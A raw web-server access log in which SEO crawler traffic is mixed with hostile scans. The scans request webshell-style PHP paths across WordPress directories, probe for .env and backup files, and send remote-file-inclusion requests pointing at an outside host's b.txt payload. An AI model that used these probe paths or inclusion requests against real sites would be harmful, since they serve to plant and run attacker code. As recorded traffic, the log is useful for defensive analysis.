216.244.66.237 - - [04/May/2023:20:13:02 +0000] "GET /?p=217 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [04/May/2023:20:40:18 +0000] "POST /wp-content/themes/twentyseventeen/inc/back-compat.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
107.178.109.236 - - [04/May/2023:20:40:36 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.3"
185.191.171.43 - - [04/May/2023:20:51:02 +0000] "GET /?p=1080 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [04/May/2023:21:03:08 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:21:10:25 +0000] "GET /?C=S;O=A HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:21:11:11 +0000] "GET /?p=202 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:21:11:15 +0000] "GET /?p=912 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.15 - - [04/May/2023:21:16:50 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [04/May/2023:21:16:50 +0000] "GET /?p=325 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
211.226.103.94 - - [04/May/2023:21:30:02 +0000] "GET /backup.zip HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
185.191.171.15 - - [04/May/2023:21:43:40 +0000] "GET /?p=695 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [04/May/2023:22:01:17 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:22:09:21 +0000] "GET /?p=200 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:22:10:54 +0000] "GET /?%2Ffeed%2Fessays%2Frecent_rss HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.5 - - [04/May/2023:22:24:20 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [04/May/2023:22:24:20 +0000] "GET /?p=266 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
82.118.29.29 - - [04/May/2023:22:26:59 +0000] "GET / HTTP/1.0" 200 1781 "http://laurencegaudet.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
185.191.171.33 - - [04/May/2023:22:28:44 +0000] "GET /?p=381 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [04/May/2023:22:32:05 +0000] "GET /wp-content/uploads/2020/11/ups.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.191.171.40 - - [04/May/2023:22:35:36 +0000] "GET /?p=1435 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [04/May/2023:22:37:27 +0000] "GET /wp-includes/widgets/class-wp-widget-content.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.012; !en.support.wordpress.com; !support.wordpress.com; support.wordpress.com; en.support.wordpress.com) Gecko/20120121 Firefox/40.0"
185.191.171.37 - - [04/May/2023:22:41:34 +0000] "GET /?p=1353 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [04/May/2023:22:53:49 +0000] "POST /wp-content/plugins/akismet/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [04/May/2023:22:59:42 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.35 - - [04/May/2023:23:00:47 +0000] "GET /?p=655 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [04/May/2023:23:03:51 +0000] "POST /wp-content/themes/twentyseventeen/front-page.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
37.187.76.13 - - [04/May/2023:23:06:49 +0000] "GET /wp-content/plugins/woocommerce/assets/images/icons/loader.svg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
216.244.66.237 - - [04/May/2023:23:07:51 +0000] "GET /?p=208 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:23:07:59 +0000] "GET /?p=226 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:23:09:30 +0000] "GET /?%2Ffeed%2Ftimeline%2Frecent_rss HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [04/May/2023:23:11:17 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2Fcontent%2Fvoltaire%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
114.119.142.212 - - [04/May/2023:23:15:42 +0000] "GET /log/error.log HTTP/1.1" 200 257052 "http://laurencegaudet.com/log/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.237 - - [04/May/2023:23:57:25 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [04/May/2023:23:59:41 +0000] "POST /wp-content/uploads/2020/04/s_noeval.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:00:01:22 +0000] "POST /wp-content/plugins/so-widgets-bundle/widgets/widgets.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:00:05:35 +0000] "GET /?p=241 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:00:05:39 +0000] "GET /?p=253 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:00:10:17 +0000] "POST /wp-content/plugins/gassembly/js/js.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:00:16:25 +0000] "POST /wp-includes/wp-includes.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:00:24:06 +0000] "GET /wp-content/themes/droprod/sett.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:00:26:24 +0000] "POST /wp-content/themes/twentynineteen/sass/sass.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:00:37:04 +0000] "POST /wp-content/plugins/background-image-cropper/index3.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
51.222.253.16 - - [05/May/2023:00:39:12 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.11 - - [05/May/2023:00:39:13 +0000] "GET /echec/ HTTP/1.1" 200 6504 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
152.89.196.77 - - [05/May/2023:00:39:17 +0000] "POST /wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:00:54:04 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:00:59:25 +0000] "POST /wp-content/plugins/quick-setup/css/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:01:02:16 +0000] "GET /?p=219 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:01:02:23 +0000] "GET /?p=236 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:01:06:12 +0000] "GET /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
185.191.171.35 - - [05/May/2023:01:39:04 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [05/May/2023:01:39:04 +0000] "GET /?p=1351 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:01:47:04 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:01:50:18 +0000] "POST /wp-includes/Text/Diff/Engine/tive.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:01:55:14 +0000] "GET /?p=283 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:01:57:41 +0000] "POST /wp-content/plugins/seoplugins/mar.php?y HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
216.244.66.237 - - [05/May/2023:01:57:47 +0000] "GET /?%2Falbums%2Faquarelle%2Fcontent%2Fneige-3%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:01:58:47 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2Fcontent%2Fimg-870%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:02:05:14 +0000] "POST /wp-includes/class-wordpress-license.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:02:05:32 +0000] "POST /wp-admin/form.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
185.191.171.10 - - [05/May/2023:02:12:21 +0000] "GET /?p=854 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:02:15:30 +0000] "POST /wp-content/uploads/.0badb.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:02:18:13 +0000] "POST /wp-content/plugins/wordpresssh3ll/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
51.222.253.14 - - [05/May/2023:02:18:58 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.6 - - [05/May/2023:02:18:59 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.11 - - [05/May/2023:02:18:59 +0000] "GET /icons/text.gif HTTP/1.1" 200 229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.13 - - [05/May/2023:02:19:00 +0000] "GET /icons/compressed.gif HTTP/1.1" 200 1038 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.19 - - [05/May/2023:02:19:16 +0000] "GET /?p=1950 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:02:21:57 +0000] "POST /wp-content/hbhbrdryld.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:02:30:07 +0000] "POST /wp-includes/js/tinymce/tinymce.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
216.244.66.237 - - [05/May/2023:02:36:38 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:02:45:14 +0000] "GET /?p=295 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:02:48:45 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2Fcontent%2Fdignite%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:02:50:24 +0000] "POST /wp-content/uploads/2019/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
34.170.120.139 - - [05/May/2023:03:01:13 +0000] "GET /wp-content/plugins/akismet/class.akismet-widget-cron.php HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)"
35.235.124.158 - - [05/May/2023:03:01:14 +0000] "GET /wp-content/plugins/elementor-pro/plugin-ajax-response.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; MALNJS; rv:11.0) like Gecko"
34.145.251.58 - - [05/May/2023:03:01:20 +0000] "GET /wp-includes/cron-meta.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
35.197.37.220 - - [05/May/2023:03:01:35 +0000] "GET /wp-admin/includes/class-walker-category-checklist-meta.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99"
35.247.247.98 - - [05/May/2023:03:01:56 +0000] "GET /wp-config-sample.php?private HTTP/1.1" 404 16 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)"
34.75.158.178 - - [05/May/2023:03:02:13 +0000] "GET /wp-admin/includes/class-wp-community-events-ajax-response.php?limit=ofj.hu/ajax HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; WOW64; Trident/7.0)"
34.75.186.212 - - [05/May/2023:03:02:17 +0000] "GET /wp-includes/capabilities-ajax-response.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
35.247.10.58 - - [05/May/2023:03:02:24 +0000] "GET /wp-admin/network/user-new-core.php?varname=ofj.hu/ajax HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
152.89.196.77 - - [05/May/2023:03:09:02 +0000] "POST /upload/upload.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:03:09:03 +0000] "GET /wp-content/ave.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:03:10:38 +0000] "POST /wp-admin/user/myk.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:03:15:47 +0000] "GET /wp-includes/Requests/Exception/HTTP/512.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.012; !en.support.wordpress.com; !support.wordpress.com; support.wordpress.com; en.support.wordpress.com) Gecko/20120121 Firefox/40.0"
152.89.196.77 - - [05/May/2023:03:16:15 +0000] "POST /wp-admin/widgets-cron.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:03:30:11 +0000] "POST /wp-admin/67930613.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
84.46.255.144 - - [05/May/2023:03:30:42 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
84.46.255.144 - - [05/May/2023:03:30:46 +0000] "GET /log/access.log HTTP/1.1" 200 1863911 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
152.89.196.77 - - [05/May/2023:03:30:50 +0000] "POST /wp-includes/class-index-wordpress.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.237 - - [05/May/2023:03:32:13 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:03:38:59 +0000] "GET /wp-content/plugins/xwp-1/up.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
216.244.66.237 - - [05/May/2023:03:40:45 +0000] "GET /?p=499 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:03:41:02 +0000] "POST /wp-includes/js/tinymce/plugins/plugins.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:03:48:15 +0000] "POST /wp-content/themes/hello-elementor/vale.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:03:49:55 +0000] "GET /wp-content/plugins/cache-wordpress/inc/uploader.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:03:53:59 +0000] "POST /wp-content/plugins/easyrotator-for-wordpress/a.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:04:27:13 +0000] "POST /wp-content/themes/twentyseventeen/page.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.237 - - [05/May/2023:04:29:17 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:04:29:23 +0000] "POST /wp-admin/wp-admin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:04:32:37 +0000] "GET /wp-content/uploads/2022/09/ups.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:04:35:01 +0000] "POST /cache/accesson1.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
216.244.66.237 - - [05/May/2023:04:37:39 +0000] "GET /?p=228 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.4 - - [05/May/2023:04:46:03 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [05/May/2023:04:46:03 +0000] "GET /?p=405 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:05:06:36 +0000] "POST /wp-content/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:05:06:40 +0000] "GET /wp-content/uploads/2020/12/ups.phpups.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
82.166.160.136 - - [05/May/2023:05:07:02 +0000] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
185.191.171.5 - - [05/May/2023:05:10:25 +0000] "GET /?p=927 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:05:15:01 +0000] "POST /wp-content/wp-include-map.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:05:17:29 +0000] "POST /wp-content/plugins/Login-wall-INmrj/temp.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
185.191.171.13 - - [05/May/2023:05:20:12 +0000] "GET /?p=343 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:05:26:05 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:05:28:39 +0000] "POST /wp-content/plugins/wp-members-master/widget-tag.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
185.191.171.33 - - [05/May/2023:05:30:10 +0000] "GET /echec/create.php HTTP/1.1" 200 4074 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:05:32:19 +0000] "POST /wp-includes/ID3/menu_settings.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:05:35:56 +0000] "POST /wp-content/plugins/plugins.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:05:36:00 +0000] "POST /wp-content/themes/busify/bindex.php?url=http://152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
216.244.66.237 - - [05/May/2023:05:37:19 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2Fcontent%2Fimg-878%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:05:39:20 +0000] "POST /wp-content/plugins/press/wp-class.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
185.191.171.33 - - [05/May/2023:05:41:38 +0000] "GET /?p=1225 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
